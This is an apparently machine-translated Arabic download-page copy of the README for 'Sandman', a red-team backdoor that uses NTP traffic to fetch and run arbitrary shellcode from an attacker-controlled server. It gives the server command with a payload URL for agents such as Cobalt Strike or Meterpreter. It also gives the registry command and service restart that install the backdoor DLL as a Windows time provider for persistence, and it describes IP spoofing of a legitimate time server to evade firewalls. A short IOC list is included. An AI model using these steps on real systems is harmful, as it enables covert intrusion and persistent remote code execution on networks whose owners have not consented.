الصفحة الرئيسية>المتعلقة بالبرمجة>شفرة المصدر الأخرى
تنزيل

ساندمان

ساندمان هو الباب الخلفي الذي يهدف إلى العمل على شبكات صلبة خلال ارتباطات الفريق الأحمر.

يعمل Sandman باعتباره Stager ويستفيد من NTP (بروتوكول لمزامنة الوقت والتاريخ) للحصول على رمز shellcode التعسفي من خادم محدد مسبقًا.

نظرًا لأن NTP هو بروتوكول يتم تجاهله من قبل العديد من المدافعين مما يؤدي إلى إمكانية وصول على نطاق واسع للشبكة.

الاستخدام

ساندمان

Sandmanserver (الاستخدام)

تشغيل على جهاز Windows / *NIX: 

python3 sandman_server.py " Network Adapter " " Payload Url " " optional: ip to spoof "

  • محول الشبكة: المحول الذي تريد أن يستمع إليه الخادم (على سبيل المثال Ethernet for Windows ، eth0 لـ *nix).

  • عنوان URL للحمولة الحمولة: عنوان URL إلى رمز shellcode الخاص بك ، يمكن أن يكون وكيلك (على سبيل المثال ، cobaltstrike أو meterpreter) أو أي شخص آخر.

  • IP to Spoof: إذا كنت ترغب في الحصول على عنوان IP شرعي (على سبيل المثال ، Time.Microsoft.com عنوان IP).

Sandmanbackdoor (الاستخدام)

للبدء ، يمكنك تجميع Sandmanbackdoor كما هو مذكور أدناه ، لأنه واحد قابل للوزن خفيفة الوزن ، يمكنك تنفيذه عبر ExecuteAssmbly ، أو تشغيله كمزود NTP أو مجرد تنفيذه/حقنه.

Sandmanbackdoortimeprovider (الاستخدام)

لاستخدامه ، ستحتاج إلى اتباع الخطوات البسيطة:

  • أضف قيمة التسجيل التالية: 
 reg add " HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesW32TimeTimeProvidersNtpClient " /v DllName /t REG_SZ /d " C:PathToTheDll.dll "
  • أعد تشغيل خدمة W32Time: 
 sc stop w32time
sc start w32time

ملاحظة: تأكد من تجميعك مع خيار X64 وليس أي خيار وحدة المعالجة المركزية!

القدرات

  • الحصول على حمولة تعسفية وتنفيذها من الخادم الذي يتم التحكم فيه للمهاجم.

  • يمكن أن تعمل على الشبكات المتصلب لأن NTP مسموح عادة في FW.

  • انتحال شخصية خادم NTP شرعي عبر خداع IP.

يثبت

Sandmanserver (الإعداد)

  • بيثون 3.9

  • يتم تحديد المتطلبات في ملف المتطلبات.

Sandmanbackdoor (الإعداد)

لتجميع الباب الخلفي ، استخدمت Visual Studio 2022 ، ولكن كما هو مذكور في قسم الاستخدام ، يمكن تجميعه مع كل من VS2022 و CSC. يمكنك تجميعه إما باستخدام use_shellcode واستخدام orca shellcode أو بدون use_shellcode لاستخدام WebClient.

SandmanbackdoortimeProvider (الإعداد)

لتجميع الباب الخلفي ، استخدمت Visual Studio 2022 ، ستحتاج أيضًا إلى تثبيت Dllexport (عبر Nuget أو أي طريقة أخرى) لتجميعها. يمكنك تجميعه إما باستخدام use_shellcode واستخدام orca shellcode أو بدون use_shellcode لاستخدام WebClient.

IOCS

  • يتم حقن رمز الصدفة في بروك الوقت.

  • يبدأ اتصال NTP المشبوه برأس سحري معروف.

  • حكم يارا.

يساهم

  • orca لرمز القشرة.

  • شكر خاص لتيم ماكجوفن لفكرة مزود الوقت.

بفضل أولئك الذين ساهموا بالفعل وسأقبل الإسهامات بسعادة ، وأقدم طلب سحب وسأراجعه!

يوسع
معلومات إضافية
تطبيقات ذات صلة
نوصي لك
أخبار ذات صلة الكل